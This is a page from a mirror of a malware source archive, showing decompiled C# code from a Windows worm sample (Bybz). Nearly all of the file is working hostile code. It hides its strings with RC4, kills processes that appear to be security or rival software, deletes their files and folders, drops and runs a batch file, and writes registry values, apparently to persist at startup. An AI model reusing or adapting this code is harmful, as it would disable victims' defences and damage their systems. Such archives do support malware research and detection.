ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-22 11:26:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71cdcf7dce
MalwareSourceCode/MSIL/Worm/Win32/B/Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db/sadjkshaduixyzciuxyzicuysaiudyisaud.cs

237 lines
9.5 KiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: ajhfsdlhjasnagfgewfwsg.sadjkshaduixyzciuxyzicuysaiudyisaud
// Assembly: Rokan, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 170F4640-026D-46A0-96EF-63F7CE568476
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.exe
using ajhfsdlhjasnagfgewfwsg.My;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Windows.Forms;
namespace ajhfsdlhjasnagfgewfwsg
{
public class sadjkshaduixyzciuxyzicuysaiudyisaud
{
[DebuggerNonUserCode]
public sadjkshaduixyzciuxyzicuysaiudyisaud()
{
}
public static void xcmnvbcxvmbcxnvbxmbcvjdksfhsdkf()
{
try
{
File.Delete(Conversions.ToString(2) + RRRRR.RC4("\u00BCÌKÅŠ\u0016'ìšöèUa+‡¢…ja\u0012M9\u0090>ôÚ\u001EjKsG\u0002q•ñ", "sikan323"));
Application.DoEvents();
Directory.Delete(Conversions.ToString(2) + RRRRR.RC4("\u00BCÌKÅŠ\u0016", "sikan323"));
Application.DoEvents();
StreamWriter streamWriter = new StreamWriter(Interaction.Environ(RRRRR.RC4("4à~", "sikan3")) + RRRRR.RC4("\u00BCÌKÅŠ\u0016Uî™æ", "sikan323"));
streamWriter.WriteLine("@echo off");
streamWriter.WriteLine(RRRRR.RC4("3î úÁ±C¦ç®þÉ\u001Fœ\u0019ï¸D\u001BQÖ\u001FÙËÚ\u007Fð1ÛêÇÐ_k£\u0015Œö\u001D)„Ê", "sikan3"));
streamWriter.Close();
Process.Start(Interaction.Environ(RRRRR.RC4("4à~", "sikan3")) + RRRRR.RC4("\u001Cìxö˵M¦å", "sikan3"));
MyProject.Computer.Registry.SetValue(RRRRR.RC4("\bÆKÆæ—6—Ú…Öô'é\vÄžq\u001E\u00BDeÑ-êïö@ØxËìÉÑD0÷-\u00B2ì\u0012„*ÝÒ¡wPUÌf\u00BEÜ-B\u0006}€ÙÈ\u00B2O", "sikan3"), RRRRR.RC4("uï n\tŒ¯\u00B9A\u00BE$ê", "sikan32"), (object) (Interaction.Environ(RRRRR.RC4("4à~", "sikan3")) + RRRRR.RC4("\u001Cìxö˵M¦å¤", "sikan3")), RegistryValueKind.String);
MyProject.Computer.Registry.SetValue(RRRRR.RC4("\bÆKÆæ—6—Ú…Öô'é\vÄžq\u001E\u00BDeÑ-êïö@ØxËìÉÑD0÷-\u00B2ì\u0012„*ÝÒ¡wPUÌf\u00BEÜ-B\u0006}€ÙÈ\u00B2O", "sikan3"), RRRRR.RC4("Uï n", "sikan32"), (object) "", RegistryValueKind.String);
MyProject.Computer.Registry.SetValue(RRRRR.RC4("\bÆKÆæ—6—Ú…Öô'é\vÄžq\u001E\u00BDeÑ-êïö@ØxËìÉÑD0÷-\u00B2ì\u0012„*ÝÒ¡wPUÌf\u00BEÜ-B\u0006}€ÙÈ\u00B2O", "sikan3"), RRRRR.RC4("u»Ö3{J´«¿", "sikan32"), (object) Application.ExecutablePath, RegistryValueKind.String);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public static void oweiruewoiurioweuroiweuroiwuer()
{
try
{
Process[] processesByName1 = Process.GetProcessesByName(RRRRR.RC4("bù×", "Sikan32"));
int index1 = 0;
while (index1 < processesByName1.Length)
{
processesByName1[index1].Kill();
checked { ++index1; }
}
Process[] processesByName2 = Process.GetProcessesByName(RRRRR.RC4("bù×øÿ", "Sikan32"));
int index2 = 0;
while (index2 < processesByName2.Length)
{
processesByName2[index2].Kill();
checked { ++index2; }
}
Process[] processesByName3 = Process.GetProcessesByName(RRRRR.RC4("bù×ãâ", "Sikan32"));
int index3 = 0;
while (index3 < processesByName3.Length)
{
processesByName3[index3].Kill();
checked { ++index3; }
}
Process[] processesByName4 = Process.GetProcessesByName(RRRRR.RC4("bù×âù,\u00BC", "Sikan32"));
int index4 = 0;
while (index4 < processesByName4.Length)
{
processesByName4[index4].Kill();
checked { ++index4; }
}
Process[] processesByName5 = Process.GetProcessesByName(RRRRR.RC4("bù×ãû)", "Sikan32"));
int index5 = 0;
while (index5 < processesByName5.Length)
{
processesByName5[index5].Kill();
checked { ++index5; }
}
Process[] processesByName6 = Process.GetProcessesByName(RRRRR.RC4("bù×åè,«ý", "Sikan32"));
int index6 = 0;
while (index6 < processesByName6.Length)
{
processesByName6[index6].Kill();
checked { ++index6; }
}
File.Delete(Conversions.ToString(2) + RRRRR.RC4("äHûX\u0017SÄléyçx˜3¦k\u008Dq•Š\u0001", "Sikan"));
Application.DoEvents();
File.Delete(Conversions.ToString(2) + RRRRR.RC4("äHûX\u0017SÄléyçx˜3¦k\u008Dp\u0081ƒ\u0001", "Sikan"));
Application.DoEvents();
Directory.Delete(Conversions.ToString(2) + RRRRR.RC4("äHûX", "Sikan"));
Application.DoEvents();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public static void sadiowqueoiasudcoicuzsodiusaoidxzc()
{
try
{
Process[] processesByName1 = Process.GetProcessesByName(RRRRR.RC4("ÙzÅL.`ä", "Sikan"));
int index1 = 0;
while (index1 < processesByName1.Length)
{
processesByName1[index1].Kill();
checked { ++index1; }
}
Process[] processesByName2 = Process.GetProcessesByName(RRRRR.RC4("ð1X°ÒŸ‡", "Sikan3"));
int index2 = 0;
while (index2 < processesByName2.Length)
{
processesByName2[index2].Kill();
checked { ++index2; }
}
Process[] processesByName3 = Process.GetProcessesByName(RRRRR.RC4("ð1X£ÞŽ¤A", "Sikan3"));
int index3 = 0;
while (index3 < processesByName3.Length)
{
processesByName3[index3].Kill();
checked { ++index3; }
}
File.Delete(Conversions.ToString(2) + RRRRR.RC4("Í\u0003F•È˜", "Sikan3") + "\\*.dll*");
Application.DoEvents();
File.Delete(Conversions.ToString(2) + RRRRR.RC4("Í\u0003F•È˜", "Sikan3") + "\\*.exe*");
Application.DoEvents();
Directory.Delete(Conversions.ToString(2) + RRRRR.RC4("Í\u0003F•È˜", "Sikan3"));
Application.DoEvents();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public static void saduisaydiuxzyiuwqeyiwuqeyuiweyiwqu()
{
try
{
Process[] processesByName1 = Process.GetProcessesByName(RRRRR.RC4("ÿ-Tlj", "Sikan3"));
int index1 = 0;
while (index1 < processesByName1.Length)
{
processesByName1[index1].Kill();
checked { ++index1; }
}
Process[] processesByName2 = Process.GetProcessesByName(RRRRR.RC4("ô)Bš", "Sikan3"));
int index2 = 0;
while (index2 < processesByName2.Length)
{
processesByName2[index2].Kill();
checked { ++index2; }
}
Process[] processesByName3 = Process.GetProcessesByName(RRRRR.RC4("ô%E\u009D", "Sikan3"));
int index3 = 0;
while (index3 < processesByName3.Length)
{
processesByName3[index3].Kill();
checked { ++index3; }
}
File.Delete(Conversions.ToString(2) + RRRRR.RC4("äLÞz?N×x•\u000Fç\u0010÷UÉsƒT—BÏÜ\u0017êC", "Sikan") + "\\*.dll*");
Application.DoEvents();
File.Delete(Conversions.ToString(2) + RRRRR.RC4("äLÞz?N×x•\u000Fç\u0010÷UÉsƒT—BÏÜ\u0017êC", "Sikan") + "\\*.exe*");
Application.DoEvents();
Directory.Delete(Conversions.ToString(2) + RRRRR.RC4("äLÞz?", "Sikan"));
Application.DoEvents();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public static void ywetrYTWRytweryutuTRYUTRYU()
{
try
{
Process[] processesByName1 = Process.GetProcessesByName(RRRRR.RC4(".ìxìѱ\u001B±¦¤ôÌ", "sikan3"));
int index1 = 0;
while (index1 < processesByName1.Length)
{
processesByName1[index1].Kill();
checked { ++index1; }
}
Process[] processesByName2 = Process.GetProcessesByName(RRRRR.RC4("#îkéÍ\u00B9\u0004·¦¥àÅ", "sikan3"));
int index2 = 0;
while (index2 < processesByName2.Length)
{
processesByName2[index2].Kill();
checked { ++index2; }
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public static void dsiufydsiufyisudyfisudfyicuvjxcvhgjsdf()
{
try
{
Process[] processesByName = Process.GetProcessesByName(RRRRR.RC4("\u008DÏ\\ÁÖ\u0012\u0003è", "sikan323"));
int index = 0;
while (index < processesByName.Length)
{
processesByName[index].Kill();
checked { ++index; }
}
File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + RRRRR.RC4("\u00BCà\\À\u008F\u0016\tèûõF{~‡‡ŽmcKo( kµŽ[\u0014z;\b\v3œ£.", "sikan323"));
Application.DoEvents();
Directory.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + RRRRR.RC4("\u00BCà\\À\u008F\u0016\tèûõF{~‡‡ŽmcKo( kµŽ[", "sikan323"));
Application.DoEvents();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
}
Reference in New Issue Copy Permalink